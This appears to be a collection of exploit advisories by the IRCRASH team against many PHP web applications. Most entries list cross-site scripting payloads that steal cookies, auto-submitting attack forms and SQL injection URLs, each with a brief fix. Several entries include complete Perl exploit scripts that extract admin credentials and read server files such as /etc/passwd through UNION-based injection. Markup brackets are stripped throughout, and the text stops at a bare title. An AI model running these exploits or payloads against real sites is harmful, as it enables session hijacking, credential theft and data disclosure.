Script : FlexCMS = 2.5 Type : Cross Site Scripting Vulnerability Alert : Low Download From : http://www.flexcms.com/ Discovered by : Khashayar Fereidani Or Dr.Crash My Website : HTTP://FEREIDANI.IR Team Website : Http://IRCRASH.COM Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com Cross Site Scripting Vulnerability : File Name : inc-core-admin-editor-previouscolorsjs.php Vulnerable Variable : PreviousColorsString Send Method : GET Register_globals : On Dangerous PHP Code (LINE 53) : print 'document.write(\''.$PreviousColorsString.'\');'; Address : http://example/inc-core-admin-editor-previouscolorsjs.php?PreviousColorsString=scriptalert(document.cookie)/script An attacker can hijack the admin cookie with this vulnerability . Solution for patch : filter the PreviousColorsString variable with the htmlspecialchars() function . Because line 53 prints the value inside a single-quoted JavaScript string , the escaping also has to cover single quotes and backslashes ; htmlspecialchars() leaves backslashes untouched , so a JavaScript-string encoder such as json_encode() is the safer choice there . Tnx : God HTTP://IRCRASH.COM
Pluck 4.5.2 Multiple Cross Site Scripting Vulnerabilities
Script : Pluck 4.5.2 Type : Multiple Cross Site Scripting Vulnerabilities Alert : Medium Download From : http://www.pluck-cms.org/downloads/pluck-4_5_2.tar.gz Discovered by : Khashayar Fereidani Or Dr.Crash My Website : HTTP://FEREIDANI.IR Our Team Website : HTTP://IRCRASH.COM Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com Cross Site Scripting Vulnerabilities : All vulnerabilities work when register_globals set as on , XSS Vulnerability 1 : /data/inc/footer.php = http://Example.com/data/inc/footer.php?lang_footer=[Cross Site Scripting] XSS Vulnerability 2 : /data/inc/header.php = http://Example.com/data/inc/header.php?pluck_version=[Cross Site Scripting] XSS Vulnerability 3 : /data/inc/header.php = http://Example.com/data/inc/header.php?lang_install22=[Cross Site Scripting] XSS Vulnerability 4 : /data/inc/header.php = http://Example.com/data/inc/header.php?titelkop=[Cross Site Scripting] XSS Vulnerability 5 : /data/inc/header.php = http://Example.com/data/inc/header.php?lang_kop1=[Cross Site Scripting] XSS Vulnerability 6 : /data/inc/header.php = http://Example.com/data/inc/header.php?lang_kop2=[Cross Site Scripting] XSS Vulnerability 7 : /data/inc/header.php = http://Example.com/data/inc/header.php?lang_modules=[Cross Site Scripting] XSS Vulnerability 8 : /data/inc/header.php = http://Example.com/data/inc/header.php?lang_kop4=[Cross Site Scripting] XSS Vulnerability 9 : /data/inc/header.php = http://Example.com/pluck/data/inc/header.php?lang_kop15=[Cross Site Scripting] XSS Vulnerability 10 : /data/inc/header.php = http://Example.com/data/inc/header.php?lang_kop5=[Cross Site Scripting] XSS Vulnerability 11 : /data/inc/header.php = http://Example.com/data/inc/header.php?titelkop=[Cross Site Scripting] XSS Vulnerability 12 : /data/inc/header2.php = http://Example.com/data/inc/header2.php?pluck_version=[Cross Site Scripting] XSS Vulnerability 13 : /data/inc/header2.php = http://Example.com/data/inc/header2.php?titelkop=[Cross Site Scripting] XSS 
Vulnerability 14 : /data/inc/header2.php = http://Example.com/data/inc/header2.php?titelkop=[Cross Site Scripting] XSS Vulnerability 15 : /data/inc/themeinstall.php = http://Example.com/data/inc/themeinstall.php?lang_theme6=[Cross Site Scripting] Solution : Filter all of the insecure variables with the htmlspecialchars() function . Tnx : God HTTP://IRCRASH.COM HTTP://FEREIDANI.IR
Xampp Linux 1.6.7 Multiple Cross Site Scripting Vulnerabilities
Program : Xampp Linux 1.6.7 Type : Multiple Cross Site Scripting Vulnerabilities Alert : Medium Download From : http://puzzle.dl.sourceforge.net/sourceforge/xampp/xampp-linux-1.6.7.tar.gz Discovered by : Khashayar Fereidani Or Dr.Crash My Website : HTTP://FEREIDANI.IR Team Website : Http://IRCRASH.COM Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com Cross Site Scripting Vulnerabilities : The vulnerabilities work when register_globals is set to On . http://Example.com/xampp/iart.php?text=;''scriptalert(document.alert)/script http://Example.com/xampp/ming.php?text=;''scriptalert(document.alert)/script Solution : Remove the xampp folder or filter the text variable with the htmlspecialchars() function . Tnx : God HTTP://IRCRASH.COM
MJGuest 6.8 GT Cross Site Scripting Vulnerability
Script : MJGuest 6.8 GT Type : Cross Site Scripting Vulnerability Alert : Medium Discovered by : Khashayar Fereidani Our Team : IRCRASH My Official Website : HTTP://FEREIDANI.IR Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com Khashayar Fereidani Official Website : HTTP://FEREIDANI.IR Script Download : http://www.mdsjack.bo.it/files/mjguest_6.8gt.zip XSS Vulnerability : Invalid Code : ./guestbook.js.php = document.write('a href=javascript:guestbook()' + '?php echo $_GET['link']?' + '/a'); Vulnerable variable : link Address : http://Example/guestbook.js.php?link=[XSS] Solution : Filter the link variable with the htmlspecialchars() function . Because the value is echoed inside a single-quoted JavaScript string , single quotes and backslashes must be escaped as well ; htmlspecialchars() only handles the quote , and only when ENT_QUOTES is passed . Tnx : God HTTP://IRCRASH.COM
DEV WMS Multiple Vulnerabilities
Script : DEV WMS Type : Multiple Vulnerabilities ( Local file inclusion / Cross Site Scripting / SQL Injection ) Alert : High Discovered by : Khashayar Fereidani Or Dr.Crash My Website : HTTP://FEREIDANI.IR Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com Script Download : http://dev-wms.sourceforge.net/ XSS Vulnerability 1 : Variable Sent Method : GET Vulnerable Variable : session Address : http://Example.com/?session=;scriptalert(document.cookie)/script Solution : filter session variable with htmlspecialchars() function ... Xss Vulnerability 2 : Variable Sent Method : POST Vulnerable Variable : kluc Address : http://Example.com/index.php?session=0action=search change example.com to script address in a real site and save as ircrash.html , open file with browser and see your cookie . html head/head body onLoad=javascript:document.form.submit() form action=http://Example.com/index.php?session=0action=search; method=POST name=form form method=post onSubmit=return validateprm(this)input type=hidden name=prip value=true/input type=hidden name=action value=search/ input type=hidden name=kluc value=#34#39#39#39#60#62#62#62#62scriptalert('xss')/script /form /body /html Solution : filter kluc variable with htmlspecialchars() function ... SQL Injection : Method Of Send : GET Vulnerable Variable : article Address : http://Example.com/index.php?session=0action=readclick=openarticle=[SQL CODE] Solution : Filter danger caracter for article variable ... Local file inclusion : Method Of Send : GET Vulnerable Variable : step Address : http://Example.com/admin/index.php?start=installstep=file.type%00 Solution : Filter step variable with if function ... Tnx : God HTTP://IRCRASH.COM
Easybookmarker 40tr Xss Vulnerability By Khashayar Fereidani
Script : Easybookmarker 40tr Type : Xss Vulnerability Method : POST Alert : High Discovered by : Khashayar Fereidani a.k.a. Dr.Crash My Offical Website : HTTP://FEREIDANI.IR Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com Khashayar Fereidani Offical Website : HTTP://FEREIDANI.IR Script Download : http://myiosoft.com/download/EasyBookMarker/easybookmarker-40tr.zip Xss Vulnerability : Variable : rs Send Method : POST Set rs variable with post method in ajaxp_backend.php : scriptalert('xss')/script for test vulnerability html head/head body onLoad=javascript:document.form.submit() form action=http://example/zomplog/ajaxp_backend.php; method=POST name=form input type=hidden name=rs value=#x22;#x20; scriptalert(document.cookie)/script /form /body /html Tnx : God HTTP://IRCRASH.COM
EasyPublish 3.0tr Multiple Vulnerabilities ( Xss / Sql Injection Exploit / File Disclosure Exploit )
#!/usr/bin/perl # # #Script : EasyPublish 3.0tr # #Type : Multiple Vulnerabilities ( Xss / Sql Injection Exploit / File Disclosure Exploit ) # #Variable Method : GET # #Alert : High # # # #Discovered by : Khashayar Fereidani a.k.a. Dr.Crash # #My Official Website : HTTP://FEREIDANI.IR # #Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com # # # #Khashayar Fereidani Offical Website : HTTP://FEREIDANI.IR # # # #Script Download : http://myiosoft.com/download/EasyPublish/easypublish-30tr.zip # # # #Xss 1 : http://Example//staticpages/easypublish/index.php?PageSection=0page=individualtable=edp_Newsread=%scriptalert(document.cookie);/script # # # #SQL Injection : # #SQL 1 : http://Example/staticpages/easypublish/index.php?PageSection=0table=edp_Newspage=individualfage=searchread=1+union+all+select+1,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),3,4,1,5+FROM+edp_puusers/*;-- # # # # #Tnx : God # # HTTP://IRCRASH.COM # # use LWP; use HTTP::Request; use Getopt::Long; sub header { print * EasyPublish 3.0tr Exploit * *Discovered by : Khashayar Fereidani * *Exploited by : Khashayar Fereidani* *My Official Website : http://fereidani.ir * ; } sub usage { print * Usage : perl $0 http://Example/ ; } $url = ($ARGV[0]); if(!$url) { header(); usage(); exit; } if($url !~ /\//){$url = $url./;} if($url !~ /http:\/\//){$url = http://.$url;} sub xpl1() { $vul = /staticpages/easypublish/index.php?PageSection=0table=edp_Newspage=individualfage=searchread=1+union+all+select+1,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),3,4,1,5+FROM+edp_puusers/*; $requestpage = $url.$vul; my $req = HTTP::Request-new(POST,$requestpage); $ua = LWP::UserAgent-new; $ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); #$req-referer($url); $req-referer(IRCRASH.COM); $req-content_type('application/x-www-form-urlencoded'); $req-header(content-length = $contlen); 
$req-content($poststring); $response = $ua-request($req); $content = $response-content; $header = $response-headers_as_string(); @name = split(/Login:/,$content); $name = @name[1]; @name = split(/enduser/,$name); $name = @name[0]; @password = split(/Password:/,$content); $password = @password[1]; @password = split(/endpass/,$password); $password = @password[0]; if(!$name !$password) { print \n\n; print !Exploit failed ! :(\n\n; exit; } print \n Username: .$name.\n\n; print Password: .$password.\n\n; } #XPL2 sub xpl2() { print \n Example For File Address : /home/user/public_html/config.php\n Or /etc/passwd; print \n Enter File Address :; $fil3 = stdin; $vul = /staticpages/easypublish/index.php?PageSection=0table=edp_Newspage=individualfage=searchread=1+union+all+select+1,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),3,4,1,5+FROM+edp_puusers/*; $requestpage = $url.$vul; my $req = HTTP::Request-new(POST,$requestpage); $ua = LWP::UserAgent-new; $ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); #$req-referer($url); $req-referer(IRCRASH.COM); $req-content_type('application/x-www-form-urlencoded'); $req-header(content-length = $contlen); $req-content($poststring); $response = $ua-request($req); $content = $response-content; $header = $response-headers_as_string(); @name = split(/Login:/,$content); $name = @name[1]; @name = split(/enduser/,$name); $name = @name[0]; if(!$name !$password) { print \n\n; print !Exploit failed ! :(\n\n; exit; } open (FILE, .source..txt); print FILE $name; close (FILE); print File Save In source.txt\n; print ; } #XPL2 END #Starting; print * EasyPublish 3.0tr Exploit * *Discovered by : Khashayar Fereidani * *Exploited by : Khashayar Fereidani* *My Official Website : http://fereidani.ir * * Mod Options
Easyecards 310a Multiple Vulnerabilities ( Xss / Sql Injection Exploit / File Disclosure Exploit ) By Khashayar Fereidani
#!/usr/bin/perl # # #Script : Easyecards 310a # #Type : Multipe Vulerabilities ( Xss / Sql Injection Exploit / File Disclosure Exploit ) # #Variable Method : GET # #Alert : High # # # #Discovered by : Khashayar Fereidani a.k.a. Dr.Crash # #My Offical Website : HTTP://FEREIDANI.IR # #Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com # # # #Khashayar Fereidani Offical Website : HTTP://FEREIDANI.IR # # # #Script Download : http://myiosoft.com/download/EasyE-Cards/easyecards-310a.zip # # #Xss 1 : http://Example/?ResultHtml=scriptalert('xss')/script # #Xss 2 : http://Example/index.php?step=2dir=''scriptalert('xss')/script # #Xss 3 : http://Example/index.php?step=2SenderName=''scriptalert('xss')/script # #Xss 4 : http://Example/index.php?step=2RecipientName=%3C%3E%3E%3E%3E%27%27%22%3Cscript%3Ealert(%27xss%27)%3C/script%3E # #Xss 5 : http://Example/index.php?step=2SenderMail=''scriptalert('xss')/script # #Xss 6 : http://Example/index.php?step=2RecipientMail=%3C%3E%3E%3E%3E%27%27%22%3Cscript%3Ealert(%27xss%27)%3C/script%3E # # # #SQL Injection : # #SQL 1 : http://Example/index.php?show=pickupsid=9'+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13/* # # # # #Tnx : God # # HTTP://IRCRASH.COM # # use LWP; use HTTP::Request; use Getopt::Long; sub header { print *Easyecards 310a Exploit * *Discovered by : Khashayar Fereidani * *Exploited by : Khashayar Fereidani* *My Official Website : http://fereidani.ir * ; } sub usage { print * Usage : perl $0 http://Example/ ; } $url = ($ARGV[0]); if(!$url) { header(); usage(); exit; } if($url !~ /\//){$url = $url./;} if($url !~ /http:\/\//){$url = http://.$url;} sub xpl1() { $vul = ?show=pickupsid=9'+union+select+0,concat(0x4c6f67696e3a,user,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),2,3,4,5,6,7,8,9,10,11,12,13+from+mysql.user/*; $requestpage = $url.$vul; my $req = HTTP::Request-new(POST,$requestpage); $ua = LWP::UserAgent-new; $ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); 
#$req-referer($url); $req-referer(IRCRASH.COM); $req-content_type('application/x-www-form-urlencoded'); $req-header(content-length = $contlen); $req-content($poststring); $response = $ua-request($req); $content = $response-content; $header = $response-headers_as_string(); @name = split(/Login:/,$content); $name = @name[1]; @name = split(/enduser/,$name); $name = @name[0]; @password = split(/Password:/,$content); $password = @password[1]; @password = split(/endpass/,$password); $password = @password[0]; if(!$name !$password) { print \n\n; print !Exploit failed ! :(\n\n; exit; } print \n Username: .$name.\n\n; print Password: .$password.\n\n; } #XPL2 sub xpl2() { print \n Example For File Address : /home/user/public_html/config.php\n Or /etc/passwd; print \n Enter File Address :; $fil3 = stdin; $vul = ?show=pickupsid=9'+union+select+0,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),2,3,4,5,6,7,8,9,10,11,12,13+from+mysql.user/*; $requestpage = $url.$vul; my $req = HTTP::Request-new(POST,$requestpage); $ua = LWP::UserAgent-new; $ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); #$req-referer($url); $req-referer(IRCRASH.COM); $req-content_type('application/x-www-form-urlencoded'); $req-header(content-length = $contlen); $req-content($poststring); $response = $ua-request($req); $content = $response-content; $header = $response-headers_as_string(); @name = split(/Login:/,$content); $name = @name[1]; @name = split(/enduser/,$name); $name = @name[0]; if(!$name !$password) { print \n\n; print !Exploit failed ! :(\n\n; exit; } open (FILE, .source..txt); print FILE $name; close (FILE); print File Save In source.txt\n; print ; } #XPL2 END #Starting; print *Easyecards 310a Exploit * *Discovered by : Khashayar Fereidani * *Exploited by : Khashayar Fereidani* *My Official Website : http://fereidani.ir
Maran PHP Blog Xss By Khashayar Fereidani
Script : Maran PHP Blog Type : XSS (Passive) Method : GET Alert : Medium Discovered by : Khashayar Fereidani a.k.a. Dr.Crash My Official Website : HTTP://FEREIDANI.IR Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com Khashayar Fereidani Official Website : HTTP://FEREIDANI.IR Script Download : http://www.maran.pamil-visions.com/download2.php?dir=maranphpfile=maranblog.zip There Is An Xss Vulnerability In The id Variable . Attacker Can Execute JavaScript Code And Get Admin Cookie And Send new article with admin cookie . Xss Address : http://Example/comments.php?id=%3E%3C%3E%27%3Cscript%3Ealert(document.cookie)%3C/script%3E Solution : Edit Source Code And Filter id Variable With htmlspecialchars() function in comments.php ... line 32 : input type='hidden' name='id' value='?echo $_GET['id'];?'br Change It To : input type='hidden' name='id' value='?echo htmlspecialchars($_GET['id']);?'br Note : the attribute is single-quoted, so pass ENT_QUOTES as the second argument ( htmlspecialchars($_GET['id'], ENT_QUOTES) ); before PHP 8.1 the default flags leave the single quote unescaped . Tnx : God HTTP://IRCRASH.COM
Easydynamicpages 30tr Multiple Vulnerabilities ( Xss / Sql Injection Exploit / File Disclosure Exploit )
#!/usr/bin/perl # # #Script : Easydynamicpages 30tr # #Type : Multipe Vulerabilities ( Xss / Sql Injection Exploit / File Disclosure Exploit ) # #Variable Method : GET # #Alert : High # # # #Discovered by : Khashayar Fereidani a.k.a. Dr.Crash # #My Offical Website : HTTP://FEREIDANI.IR # #Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com # # # #Khashayar Fereidani Offical Website : HTTP://FEREIDANI.IR # # # #Script Download : http://myiosoft.com/download/EasyDynamicPages/easydynamicpages-30tr.zip # # # #Xss 1 : http://Example/staticpages/easycalendar/index.php?PageSection=1month=4year=scriptalert(document.cookie);/script # # # #SQL Injection : # #SQL 1 : http://Example/dynamicpages/index.php?page=individualtable=edp_Help_Internal_Newsread=1+union/**/select/**/0,1,2,3,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),5,6/**/from/**/edp_puusers/* # # # # #Tnx : God # # HTTP://IRCRASH.COM # # use LWP; use HTTP::Request; use Getopt::Long; sub header { print * Easydynamicpages 30tr Exploit* *Discovered by : Khashayar Fereidani * *Exploited by : Khashayar Fereidani* *My Official Website : http://fereidani.ir * ; } sub usage { print * Usage : perl $0 http://Example/ ; } $url = ($ARGV[0]); if(!$url) { header(); usage(); exit; } if($url !~ /\//){$url = $url./;} if($url !~ /http:\/\//){$url = http://.$url;} sub xpl1() { $vul = /dynamicpages/index.php?page=individualtable=edp_Help_Internal_Newsread=1+union/**/select/**/0,1,2,3,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),5,6/**/from/**/edp_puusers/*; $requestpage = $url.$vul; my $req = HTTP::Request-new(POST,$requestpage); $ua = LWP::UserAgent-new; $ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); #$req-referer($url); $req-referer(IRCRASH.COM); $req-content_type('application/x-www-form-urlencoded'); $req-header(content-length = $contlen); $req-content($poststring); $response 
= $ua-request($req); $content = $response-content; $header = $response-headers_as_string(); @name = split(/Login:/,$content); $name = @name[1]; @name = split(/enduser/,$name); $name = @name[0]; @password = split(/Password:/,$content); $password = @password[1]; @password = split(/endpass/,$password); $password = @password[0]; if(!$name !$password) { print \n\n; print !Exploit failed ! :(\n\n; exit; } print \n Username: .$name.\n\n; print Password: .$password.\n\n; } #XPL2 sub xpl2() { print \n Example For File Address : /home/user/public_html/config.php\n Or /etc/passwd; print \n Enter File Address :; $fil3 = stdin; $vul = /dynamicpages/index.php?page=individualtable=edp_Help_Internal_Newsread=1+union/**/select/**/0,1,2,3,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),5,6/**/from/**/edp_puusers/*; $requestpage = $url.$vul; my $req = HTTP::Request-new(POST,$requestpage); $ua = LWP::UserAgent-new; $ua-agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ); #$req-referer($url); $req-referer(IRCRASH.COM); $req-content_type('application/x-www-form-urlencoded'); $req-header(content-length = $contlen); $req-content($poststring); $response = $ua-request($req); $content = $response-content; $header = $response-headers_as_string(); @name = split(/Login:/,$content); $name = @name[1]; @name = split(/enduser/,$name); $name = @name[0]; if(!$name !$password) { print \n\n; print !Exploit failed ! :(\n\n; exit; } open (FILE, .source..txt); print FILE $name; close (FILE); print File Save In source.txt\n; print ; } #XPL2 END #Starting; print * Easydynamicpages 30tr Exploit* *Discovered by : Khashayar Fereidani * *Exploited by : Khashayar Fereidani* *My Official Website : http://fereidani.ir * * Mod Options :* * Mod 1 : Find mysql username
VistaReseller Panel BETA Xss Vulnerability
## # VistaReseller Panel BETA Xss Vulnerability ## # Discovered By Khashayar Fereidani Or Ircrash # Our Team : IRCRASH # IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr # Risk : Low ## # Xss Address : http://Example/panel/index.php?option=forums # Variable : [resellerdomain] ## # How It Works : # Login In VistaReseller Panel And Open Url # Insert http://;scriptalert('xss')/script in Text box and click (Add) Button . # Now Open the Url Again And See The xss msg ## # Solution : Edit Source Code And Filter Variable With htmlspecialchars() function ... ## # Khashayar Fereidani Email : irancrash[at]gmail[at]com # Tnx : God ##
Maian Uploader v4.0 XSS Vulnerabilities
Script : Maian Uploader v4.0 Type : XSS Vulnerabilities Discovered by : Khashayar Fereidani Or Dr.Crash Our Team : IRCRASH Our Site : Http://IRCRASH.COM IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr Script Download : http://www.maianscriptworld.co.uk/free-php-scripts.html XSS 1 : http://localhost/maian/upload/admin/index.php?cmd=searchprocess=1keywords=;scriptalert('xss')/script XSS 2 : http://Example/admin/inc/header.php?msg_charset=;scriptalert('xss')/script XSS 3 : http://Example/admin/inc/header.php?msg_header9=;scriptalert('xss')/script XSS 4 : http://Example/admin/inc/header.php?msg_header9=;scriptalert('xss')/script XSS 4 : http://Example/index.php?cmd=searchkeywords=;scriptalert('xss')/script You Can Get Admin Session With This Vuln Solution : Edit Source Code And Filter Variable With htmlspecialchar() function ... TNx : God.. Khashayar Fereidani Email : irancrash[at]gmail[dot]com
LifeType 1.2.8
Script : LifeType 1.2.8 Type : XSS Vulnerability Discovered by : Khashayar Fereidani Or Dr.Crash Our Team : IRCRASH Our Site : Http://IRCRASH.COM IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr Script Download : http://mesh.dl.sourceforge.net/sourceforge/lifetype/lifetype-1.2.8.tar.bz2 Type : Cross Site Scripting Method Of Send : POST File Name : http://Example/admin.php?op=editArticleCategories Vulnerable Variable : newBlogUserName Set Add this user Variable : Add Set op Variable : addBlogUser You Can Get Admin Cookie With This Vuln Exploit : Upload This Page And Send Link For Administrator . html head/head #Vulnerabily discovered by Khashayar Fereidani Or Dr.Crash body onLoad=javascript:document.form.submit() form action=http://Example/lifetype/admin.php?op=editArticleCategories; method=POST name=form input type=hidden name=newBlogUserName value=#x22;#x20;[XSS CODE] input type=hidden name=Add this user value=Add input type=hidden name=op value=addBlogUser /form /body /html Solution : Edit Source Code And Filter newBlogUserName Variable With htmlspecialchar() function ... TNx : God.. Khashayar Fereidani Email : irancrash[at]gmail[dot]com IRCRASH TEAM - Http://IRCRASH.COM/
Maian Gallery v2.0 XSS Vulnerability
Script : Maian Gallery v2.0 Type : XSS Vulnerability Discovered by : Khashayar Fereidani Or Dr.Crash Our Team : IRCRASH Our Site : Http://IRCRASH.COM IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr Script Download : http://www.maianscriptworld.co.uk/free-php-scripts.html Xss 1 : http://Example/admin/index.php?cmd=searchsearch=1keywords=;scriptalert(document.cookie)/script Solution : Edit Source Code And Filter The keywords Variable via htmlspecialchars() function ... TNx : God.. Khashayar Fereidani Email : irancrash[at]gmail[dot]com
Maian Cart v1.1 XSS Vulnerabilities
Script : Maian Cart v1.1 Type : XSS Vulnerabilities Discovered by : Khashayar Fereidani Or Dr.Crash Our Team : IRCRASH Our Site : Http://IRCRASH.COM IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr Script Download : http://www.maianscriptworld.co.uk/free-php-scripts.html XSS 1 : http://Example/admin/inc/header.php?msg_adminheader=scriptalert(document.cookie)/script XSS 2 : http://Example/admin/inc/header.php?msg_adminheader2=scriptalert(document.cookie)/script XSS 3 : http://Example/admin/inc/header.php?msg_adminheader3=scriptalert(document.cookie)/script XSS 4 : http://Example/admin/inc/header.php?msg_adminheader4=scriptalert(document.cookie)/script Many Variable have Xss Vuln In header.php Xss 5 : http://Example/admin/inc/footer.php?msg_script3=scriptalert(document.cookie)/script Many Variable have Xss Vuln In footer.php Xss 6 : http://Example/maian/cart/index.php?cmd=searchkeywords=scriptalert(document.cookie)/scriptx=0y=0 Solution : Edit Source Code And Filter Variable With htmlspecialchar() function ... TNx : God.. Khashayar Fereidani Email : irancrash[at]gmail[dot]com
Maian Search v1.1 Multiple Vulnerabilities (XSS/SQL INJECTION)
Script : Maian Search v1.1 Type : Multiple Vulnerabilities (XSS/SQL INJECTION) Discovered by : Khashayar Fereidani Or Dr.Crash Our Team : IRCRASH Our Site : Http://IRCRASH.COM IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr Script Download : http://www.maianscriptworld.co.uk/free-php-scripts.html SQL INJECTION : http://Example/search.php?cmd=searchkeywords=[SQL INJECTION] XSS 1 : http://Example/admin/inc/header.php?header=/titlescriptalert('xss')/script XSS 2 : http://Example/admin/inc/header.php?header2=;scriptalert('xss')/script XSS 3 : http://Example/admin/inc/header.php?header3=;scriptalert('xss')/script XSS 4 : http://Example/admin/inc/header.php?header4=;scriptalert('xss')/script XSS 5 : http://Example/admin/inc/header.php?header5=;scriptalert('xss')/script XSS 6 : http://Example/admin/inc/header.php?header6=;scriptalert('xss')/script XSS 7 : http://Example/admin/inc/header.php?header7=;scriptalert('xss')/script XSS 8 : http://Example/admin/inc/header.php?header8=;scriptalert('xss')/script XSS 9 : http://Example/admin/inc/header.php?header9=;scriptalert('xss')/script You Can Get Admin Session With This Vuln Solution : Edit Source Code And Filter Variable With htmlspecialchars() function ... This covers only the XSS items ; the SQL injection in keywords needs a parameterized query ( prepared statement ) instead . TNx : God.. Khashayar Fereidani Email : irancrash[at]gmail[dot]com
Maian Guestbook v3.2 XSS Vulnerabilities
Script : Maian Guestbook v3.2 Type : XSS Vulnerabilities Discovered by : Khashayar Fereidani Or Dr.Crash Our Team : IRCRASH Our Site : Http://IRCRASH.COM IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr Script Download : http://www.maianscriptworld.co.uk/free-php-scripts.html XSS 1 : http://Example/admin/inc/footer.php?msg_script2=scriptalert(document.cookie)/script XSS 2 : http://Example/admin/inc/footer.php?msg_script3=scriptalert(document.cookie)/script Solution : Edit Source Code And Filter Variable With htmlspecialchars() function ... TNx : God.. Khashayar Fereidani Email : irancrash[at]gmail[dot]com
Maian Weblog v4.0 XSS Vulnerabilities
Script : Maian Weblog v4.0 Type : XSS Vulnerabilities Discovered by : Khashayar Fereidani Or Dr.Crash Our Team : IRCRASH Our Site : Http://IRCRASH.COM IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr Script Download : http://www.maianscriptworld.co.uk/free-php-scripts.html XSS 1 : http://Example/admin/index.php?cmd=searchsearch=1area=blogskeywords=;scriptalert('xss')/script XSS 2 : http://Example/admin/inc/header.php?msg_charset=;scriptalert('xss')/script XSS 3 : http://Example/admin/inc/header.php?msg_header9=;scriptalert('xss')/script XSS 4 : http://Example/admin/inc/header.php?msg_header9=;scriptalert('xss')/script XSS 4 : http://Example/index.php?cmd=searchkeywords=;scriptalert('xss')/script You Can Get Admin Session With This Vuln Solution : Edit Source Code And Filter Variable With htmlspecialchar() function ... TNx : God.. Khashayar Fereidani Email : irancrash[at]gmail[dot]com
Maian Greeting v2.1 Multiple Vulnerabilities (XSS/SQL INJECTION)
Script : Maian Greeting v2.1 Type : Multiple Vulnerabilities (XSS/SQL INJECTION) Discovered by : Khashayar Fereidani Or Dr.Crash Our Team : IRCRASH Our Site : Http://IRCRASH.COM IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr Script Download : http://www.maianscriptworld.co.uk/free-php-scripts.html SQL INJECTION : http://Example/index.php?cmd=searchkeywords=[SQL INJECTION]cat=all XSS 1 : http://Example/admin/inc/header.php?msg_script=;scriptalert('xss')/script XSS 2 : http://Example/admin/inc/header.php?msg_script2=;scriptalert('xss')/script You Can Get Admin Session With This Vuln Solution : Edit Source Code And Filter Variable With htmlspecialchars() function ... This covers only the XSS items ; the SQL injection in keywords needs a parameterized query ( prepared statement ) instead . TNx : God.. Khashayar Fereidani Email : irancrash[at]gmail[dot]com
Maian Support v1.3 Xss Vulnerabilities
Script : Maian Support v1.3 Type : Xss Vulnerabilities Discovered by : Khashayar Fereidani Or Dr.Crash Our Team : IRCRASH Our Site : Http://IRCRASH.COM IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr Script Download : http://www.maianscriptworld.co.uk/free-php-scripts.html XSS 1 : http://Example/admin/inc/footer.php?msg_script=;scriptalert('xss')/script XSS 2 : http://Example/admin/inc/footer.php?msg_script2=;scriptalert('xss')/script XSS 3 : http://Example/admin/inc/footer.php?msg_script3=;scriptalert('xss')/script XSS 3 : http://Example/admin/inc/header.php?msg_script2=;scriptalert('xss')/script You Can Get Admin Session With This Vuln Solution : Edit Source Code And Filter Variable With htmlspecialchar() function ... TNx : God.. Khashayar Fereidani Email : irancrash[at]gmail[dot]com
Maian Recipe v1.2 Xss Vulnerabilities
